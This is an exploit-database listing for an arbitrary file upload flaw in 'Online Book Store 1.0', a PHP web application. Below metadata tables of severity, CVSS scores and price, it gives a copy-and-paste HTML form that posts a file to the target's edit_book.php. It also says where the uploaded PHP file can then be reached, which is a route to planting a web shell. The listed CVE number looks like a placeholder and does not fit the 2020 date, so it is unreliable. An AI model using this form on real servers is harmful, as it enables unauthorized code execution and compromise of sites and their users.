Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-2021-12345 | CWE-434 | $500 | Critical |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
ExploitMaster | High | Remote | 2020-01-17 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H | 0.02192 | 0.50148 |
# Exploit Title: Online Book Store 1.0 - Arbitrary File Upload # Google Dork: N/A # Date: 2020-01-16 # Exploit Author: Or4nG.M4n aka S4udiExploit # Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/ # Software Link: https://github.com/projectworlds32/online-book-store-project-in-php/archive/master.zip # Version: 1.0 # Tested on: MY MIND v1.23.45 # CVE: N/A # WWW . SEC4EVER . COM -> hola amigos ^.^ -> just copy this html code <form method="post" action="http://TARGET/edit_book.php" enctype="multipart/form-data"> <td><input type="text" name="isbn" value="978-1-49192-706-9" readOnly="true"></td> <td><input type="text" name="author" value="Or4nG.M4n aka S4udiExploit" required></td> <td><input type="file" name="image"></td> <input type="submit" name="save_change" value="Change" class="btn btn-primary"> </form> -> after you upload your'e file u will find it here /store/bootstrap/img/[FILE].php # i think am back %^_^% # i-Hmx , N4ssim , Sec4ever , The injector , alzher , All the Member of Sec4ever.com # big thanks to Stupid Coder ^.^
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.